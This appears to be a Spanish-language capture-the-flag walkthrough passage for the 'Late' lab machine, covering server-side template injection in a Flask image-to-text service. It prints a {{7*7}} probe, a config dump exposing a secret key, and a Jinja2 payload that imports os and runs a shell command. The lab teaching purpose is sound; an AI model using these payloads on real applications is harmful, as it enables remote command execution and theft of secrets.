
se encuentra un dominio al cual se hace una peticion para cargar una imagen

	dominio : images.late.htb

Cuando llegamos a esta parte nos pide que subamos una imagen para haci esta poder ser convertida en texto

Al convertir una de estas en texto nos damos de cuenta que nos esta retornando una etiqueta de html
	
	<p></p>

Desde aqui pensamos en una inyecsion ssti en flask

tomamos un screenshoot que contenga la siguiente inyecsio {{7*7}} el resultado de esta nos debe dar 49 dentro del archivo que se nos
descarga al scanear la imagen

Si inyectamos el siguiente codigo  {{config.items()}} 

Veremos que la respuesta es la siguiente

<p>dict_items([(&#39;ENV&#39;, &#39;production&#39;), (&#39;DEBUG&#39;, False), (&#39;TESTING&#39;, False), (&#39;PROPAGATE_EXCEPTIONS&#39;, None), (&#39;PRESERVE_CONTEXT_ON_EXCEPTION&#39;, None), (&#39;SECRET_KEY&#39;, b&#39;_5#y2L&#34;F4Q8z\n\xec]/&#39;), (&#39;PERMANENT_SESSION_LIFETIME&#39;, datetime.timedelta(31)), (&#39;USE_X_SENDFILE&#39;, False), (&#39;SERVER_NAME&#39;, None), (&#39;APPLICATION_ROOT&#39;, &#39;/&#39;), (&#39;SESSION_COOKIE_NAME&#39;, &#39;session&#39;), (&#39;SESSION_COOKIE_DOMAIN&#39;, False), (&#39;SESSION_COOKIE_PATH&#39;, None), (&#39;SESSION_COOKIE_HTTPONLY&#39;, True), (&#39;SESSION_COOKIE_SECURE&#39;, False), (&#39;SESSION_COOKIE_SAMESITE&#39;, None), (&#39;SESSION_REFRESH_EACH_REQUEST&#39;, True), (&#39;MAX_CONTENT_LENGTH&#39;, None), (&#39;SEND_FILE_MAX_AGE_DEFAULT&#39;, None), (&#39;TRAP_BAD_REQUEST_ERRORS&#39;, None), (&#39;TRAP_HTTP_EXCEPTIONS&#39;, False), (&#39;EXPLAIN_TEMPLATE_LOADING&#39;, False), (&#39;PREFERRED_URL_SCHEME&#39;, &#39;http&#39;), (&#39;JSON_AS_ASCII&#39;, True), (&#39;JSON_SORT_KEYS&#39;, True), (&#39;JSONIFY_PRETTYPRINT_REGULAR&#39;, False), (&#39;JSONIFY_MIMETYPE&#39;, &#39;application/json&#39;), (&#39;TEMPLATES_AUTO_RELOAD&#39;, None), (&#39;MAX_COOKIE_SIZE&#39;, 4093)])
</p>

Ahora iniciamos a traer e importar nuestras builtins

 ${{request.application.__globals__.__builtins__.__import__("os").popen("id").read()}}

RECOMIENDO QUE SI VAS A INYECTAR ESTA CARGA UTIL SEA UN SCREENSHOT QUE SE VEA BIEN TODO EL TEXTO


